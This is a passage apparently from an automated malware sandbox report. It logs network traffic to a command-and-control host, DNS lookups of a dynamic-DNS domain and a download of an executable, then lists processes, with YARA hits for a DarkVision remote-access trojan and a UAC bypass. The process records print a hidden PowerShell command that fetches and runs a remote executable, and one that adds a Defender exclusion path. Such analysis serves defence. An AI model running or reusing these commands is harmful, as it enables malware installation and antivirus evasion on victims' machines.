                                                        Dec 31, 2024 09:29:56.969218969 CET34405935787.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:29:57.165920973 CET593573440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:29:57.971954107 CET34405935787.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:29:58.072154045 CET593573440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:29:58.972992897 CET34405935787.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:29:59.110295057 CET593573440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:29:59.973438978 CET34405935787.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:00.166960955 CET593573440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:00.975208044 CET34405935787.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:01.126781940 CET593573440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:01.976038933 CET34405935787.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:02.165923119 CET593573440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:02.976172924 CET34405935787.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:03.121155977 CET593573440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:03.979660988 CET34405935787.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:04.134040117 CET593573440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:04.987045050 CET34405935787.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:05.152717113 CET593573440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:05.988089085 CET34405935787.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:06.072177887 CET593573440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:06.988164902 CET34405935787.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:07.090332985 CET593573440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:07.988898993 CET34405935787.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:08.165951967 CET593573440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:08.989051104 CET34405935787.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:09.106794119 CET593573440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:09.990227938 CET34405935787.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:10.072182894 CET593573440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:10.992006063 CET34405935787.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:11.115957975 CET593573440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:11.996886969 CET34405935787.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:12.072170019 CET593573440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:13.001131058 CET34405935787.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:13.089462042 CET593573440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:13.869365931 CET593573440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:13.869441986 CET593683440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:13.869486094 CET593743440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:13.869625092 CET593803440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:13.869726896 CET593863440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:13.869762897 CET593923440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:13.874422073 CET34405935787.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:13.874475002 CET593573440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:13.875085115 CET34405936887.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:13.875129938 CET593683440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:13.875150919 CET34405937487.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:13.875217915 CET34405938087.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:13.875226021 CET593743440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:13.875230074 CET34405938687.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:13.875242949 CET34405939287.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:13.875269890 CET593803440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:13.875283957 CET593863440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:13.875332117 CET593923440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:18.482954025 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:18.487912893 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:18.491115093 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:18.491261959 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:18.496015072 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:19.094144106 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:19.094305038 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:19.100122929 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:19.272208929 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:19.272387981 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:19.281033039 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:19.281079054 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:19.289498091 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:19.569449902 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:19.569618940 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:19.574466944 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:19.574531078 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:19.579391956 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:19.868030071 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:19.997334003 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:19.997437954 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:20.007431984 CET596303440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:20.012203932 CET34405963087.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:20.012263060 CET596303440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:20.012547970 CET596303440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:20.017291069 CET34405963087.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:20.116276979 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:20.215018034 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:20.621546984 CET34405963087.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:20.623161077 CET596303440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:20.628032923 CET34405963087.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:20.797195911 CET34405963087.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:20.799663067 CET596313440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:20.804685116 CET34405963187.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:20.807110071 CET596313440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:20.807188988 CET596313440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:20.812027931 CET34405963187.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:21.007169962 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:21.007208109 CET34405963087.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:21.015052080 CET596303440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:21.213095903 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:21.416668892 CET34405963187.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:21.426431894 CET596313440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:21.435128927 CET34405963187.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:21.600354910 CET34405963187.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:21.652023077 CET596323440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:21.656917095 CET34405963287.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:21.657015085 CET596323440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:21.665427923 CET596323440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:21.665946960 CET596313440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:21.670201063 CET34405963287.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:22.008371115 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:22.212840080 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:22.274656057 CET34405963287.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:22.274835110 CET596323440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:22.279709101 CET34405963287.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:22.460666895 CET34405963287.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:22.461565971 CET596333440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:22.466496944 CET34405963387.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:22.466655016 CET596333440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:22.466739893 CET596333440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:22.471466064 CET34405963387.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:22.671143055 CET34405963287.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:22.671226978 CET596323440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:23.009243965 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:23.065010071 CET34405963387.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:23.065267086 CET596333440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:23.070211887 CET34405963387.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:23.212853909 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:23.235135078 CET34405963387.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:23.236469984 CET596343440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:23.241314888 CET34405963487.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:23.241384983 CET596343440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:23.241641045 CET596343440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:23.246373892 CET34405963487.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:23.322211027 CET596333440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:23.891858101 CET34405963487.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:23.892090082 CET596343440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:23.896881104 CET34405963487.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:24.049981117 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:24.114790916 CET34405963487.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:24.137079954 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:24.324986935 CET596343440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:24.327102900 CET34405963487.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:24.327356100 CET596343440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:25.009368896 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:25.212929010 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:26.012288094 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:26.215014935 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:27.013027906 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:27.212943077 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:28.012334108 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:28.212979078 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:29.013125896 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:29.119071007 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:30.013102055 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:30.056576014 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:31.019371033 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:31.072326899 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:32.015455008 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:32.056569099 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:33.016185045 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:33.056773901 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:34.016246080 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:34.056602955 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:35.016391993 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:35.072256088 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:36.016558886 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:36.056593895 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:37.017334938 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:37.074984074 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:38.018620968 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:38.072206974 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:39.018615961 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:39.072355032 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:40.019190073 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:40.072216988 CET596293440192.168.2.887.121.86.214
                                                        Dec 31, 2024 09:30:41.020850897 CET34405962987.121.86.214192.168.2.8
                                                        Dec 31, 2024 09:30:41.072276115 CET596293440192.168.2.887.121.86.214

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 31, 2024 09:28:40.022604942 CET6331153192.168.2.81.1.1.1
                                                        Dec 31, 2024 09:28:40.030807972 CET53633111.1.1.1192.168.2.8
                                                        Dec 31, 2024 09:28:42.094450951 CET53515561.1.1.1192.168.2.8
                                                        Dec 31, 2024 09:29:09.125817060 CET5351971162.159.36.2192.168.2.8
                                                        Dec 31, 2024 09:29:09.675184965 CET53564251.1.1.1192.168.2.8
                                                        Dec 31, 2024 09:30:18.038810968 CET6327953192.168.2.81.1.1.1
                                                        Dec 31, 2024 09:30:18.047810078 CET53632791.1.1.1192.168.2.8

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Dec 31, 2024 09:28:40.022604942 CET192.168.2.81.1.1.10x5d6bStandard query (0)acuweld.ddns.netA (IP address)IN (0x0001)false
                                                        Dec 31, 2024 09:30:18.038810968 CET192.168.2.81.1.1.10x46dStandard query (0)acuweld.ddns.netA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Dec 31, 2024 09:28:40.030807972 CET1.1.1.1192.168.2.80x5d6bNo error (0)acuweld.ddns.net87.121.86.214A (IP address)IN (0x0001)false
                                                        Dec 31, 2024 09:30:18.047810078 CET1.1.1.1192.168.2.80x46dNo error (0)acuweld.ddns.net87.121.86.214A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • 87.120.113.91

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.84970887.120.113.91803920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 31, 2024 09:28:24.014983892 CET167OUTGET /image.exe HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                        Host: 87.120.113.91
                                                        Connection: Keep-Alive
                                                        Dec 31, 2024 09:28:24.646550894 CET1236INHTTP/1.1 200 OK
                                                        Content-Type: application/octet-stream
                                                        Last-Modified: Mon, 30 Dec 2024 10:46:07 GMT
                                                        Accept-Ranges: bytes
                                                        ETag: "d314618a85adb1:0"
                                                        Server: Microsoft-IIS/8.5
                                                        Date: Tue, 31 Dec 2024 08:28:24 GMT
                                                        Content-Length: 4220416
                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1f 20 61 b4 5b 41 0f e7 5b 41 0f e7 5b 41 0f e7 34 37 a4 e7 5f 41 0f e7 40 dc 91 e7 51 41 0f e7 52 39 8c e7 58 41 0f e7 52 39 88 e7 5a 41 0f e7 52 39 9c e7 52 41 0f e7 5b 41 0e e7 25 41 0f e7 40 dc a4 e7 1c 41 0f e7 40 dc a5 e7 32 41 0f e7 40 dc 95 e7 5a 41 0f e7 40 dc 92 e7 5a 41 0f e7 52 69 63 68 5b 41 0f e7 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 4d e4 36 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 7c 03 00 00 e8 03 00 00 00 00 00 00 60 40 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 90 40 00 00 04 00 00 43 62 41 00 02 00 40 80 00 00 [TRUNCATED]
                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ a[A[A[A47_A@QAR9XAR9ZAR9RA[A%A@A@2A@ZA@ZARich[APEdM6g"|`@@@CbA@ p@@ pp@.rsrc@.idata @ikkqoqkj88@bywcbldd`@F@@.pdataI p@H@@@
                                                        Dec 31, 2024 09:28:24.646599054 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Dec 31, 2024 09:28:24.646611929 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Dec 31, 2024 09:28:24.646681070 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Dec 31, 2024 09:28:24.646706104 CET896INData Raw: 4c 24 40 e8 da 0a 00 00 83 f8 01 75 08 33 c9 ff 15 6d 0b 07 00 83 3d ea 50 06 00 01 75 5d 83 3d 29 09 07 00 00 75 54 e8 f6 ec 01 00 83 f8 0a 72 4a e8 8c e4 01 00 83 f8 01 75 40 48 8d 15 cc 50 06 00 8b 0d c2 50 06 00 e8 f5 78 01 00 48 89 84 24 a8
                                                        Data Ascii: L$@u3m=Pu]=)uTrJu@HPPxH$H$tH$}H$L3H$(H$(u}W=uL3IH$H$u3|
                                                        Dec 31, 2024 09:28:24.728265047 CET1236INData Raw: 00 00 75 14 e8 69 03 01 00 85 c0 75 0b b9 ff ff ff ff ff 15 ea 07 07 00 e8 c5 36 02 00 85 c0 75 08 33 c9 ff 15 d9 07 07 00 e8 24 a6 00 00 85 c0 75 08 33 c9 ff 15 c8 07 07 00 83 3d 41 4d 06 00 00 75 11 e8 3a a8 00 00 85 c0 75 08 33 c9 ff 15 ae 07
                                                        Data Ascii: uiu6u3$u3=AMu:u3="Mu!=)LuH Fu3HFu3g=Lu$=Ku=bu71u3:=Cu&!@H
                                                        Dec 31, 2024 09:28:24.728290081 CET224INData Raw: 01 00 ff 15 de 02 07 00 48 63 84 24 e0 04 01 00 83 bc 84 50 04 00 00 00 75 7c 33 d2 48 8b 8c 24 38 04 00 00 ff 15 0c 03 07 00 3d 02 01 00 00 75 65 4c 8d 05 e8 b7 06 00 33 d2 b9 00 00 10 00 ff 15 71 02 07 00 48 89 84 24 00 05 01 00 48 83 bc 24 00
                                                        Data Ascii: Hc$Pu|3H$8=ueL3qH$H$u%H2=tH$tH$PHc$Pu|3H$8~=ueL3H$H$
                                                        Dec 31, 2024 09:28:24.728300095 CET1236INData Raw: 05 01 00 00 75 25 ba 0a 00 00 00 48 8b 0d a4 e4 06 00 ff 15 3e 02 07 00 3d 02 01 00 00 74 0a e9 29 01 00 00 e9 24 01 00 00 eb 9d 48 83 bc 24 08 05 01 00 00 74 0e 48 8b 8c 24 08 05 01 00 ff 15 c2 01 07 00 e9 04 01 00 00 e9 ff 00 00 00 48 c7 84 24
                                                        Data Ascii: u%H>=t)$H$tH$H$H$H3HAH$H$8H$AE3H$=3H=tD$ H$8t3H$8H$8tH$
                                                        Dec 31, 2024 09:28:24.728360891 CET1236INData Raw: c6 00 00 00 4c 8d 44 24 50 48 8d 94 24 60 02 00 00 33 c9 e8 42 86 00 00 83 f8 01 75 62 ba 88 13 00 00 48 8b 4c 24 48 ff 15 55 fd 06 00 89 84 24 ac 06 00 00 81 bc 24 ac 06 00 00 02 01 00 00 74 0a c7 44 24 40 01 00 00 00 eb 08 c7 44 24 40 00 00 00
                                                        Data Ascii: LD$PH$`3BubHL$HU$$tD$@D$@3H$7H$H$H$tH$H|$HtHL$HD$@H_HL$HH$HD$0HD$0HHH
                                                        Dec 31, 2024 09:28:24.728419065 CET1236INData Raw: 84 24 00 02 00 00 48 83 bc 24 00 02 00 00 00 0f 84 cc 01 00 00 33 c0 66 89 84 24 10 02 00 00 48 8d 84 24 12 02 00 00 48 8b f8 33 c0 b9 06 02 00 00 f3 aa ba 04 01 00 00 48 8d 8c 24 10 02 00 00 ff 15 20 f9 06 00 85 c0 0f 86 7a 01 00 00 c7 84 24 40
                                                        Data Ascii: $H$3f$H$H3H$ z$@H$HH3`H$(H$0H3$@h$|H$ $HH@H$ H$ L$LD$`
                                                        Dec 31, 2024 09:28:24.728430986 CET1236INData Raw: 00 4c 8b 01 48 8b 10 48 8d 8c 24 a0 02 00 00 e8 0e 14 00 00 48 8d 94 24 e0 04 00 00 48 8d 4c 24 28 e8 8c 03 00 00 48 8b d0 48 8d 8c 24 a0 02 00 00 e8 fc 04 00 00 0f b6 c0 85 c0 0f 84 b5 01 00 00 c7 84 24 a8 02 00 00 00 00 00 00 eb 10 8b 84 24 a8
                                                        Data Ascii: LHH$H$HL$(HH$$$$O9$Hc$Hk4HOHHHH$E2<@3f$H$H3Hc$Hk4H>OHHHH$7ef.H$


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:03:28:19
                                                        Start date:31/12/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }"
                                                        Imagebase:0x7ff6cb6b0000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:1
                                                        Start time:03:28:19
                                                        Start date:31/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:3
                                                        Start time:03:28:29
                                                        Start date:31/12/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\file.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\file.exe"
                                                        Imagebase:0x7ff7fe2c0000
                                                        File size:4'220'416 bytes
                                                        MD5 hash:D37285BF0331C7514E5E4CEC0FBE647C
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000003.00000003.1607358657.00000000045D6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000003.1607358657.00000000045D6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000003.00000000.1604613620.00007FF7FE2C1000.00000080.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000000.1604613620.00007FF7FE2C1000.00000080.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000003.00000002.1637500701.00007FF7FE2FA000.00000080.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000003.00000003.1611903304.00000000045D6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000003.1611903304.00000000045D6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.1637478663.00007FF7FE2F9000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: C:\Users\user\AppData\Local\Temp\file.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\file.exe, Author: Joe Security
                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\file.exe, Author: ditekSHen
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 74%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:4
                                                        Start time:03:28:29
                                                        Start date:31/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'
                                                        Imagebase:0x7ff70eb30000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:5
                                                        Start time:03:28:29
                                                        Start date:31/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6ee680000
                                                        File size:862'208 bytes
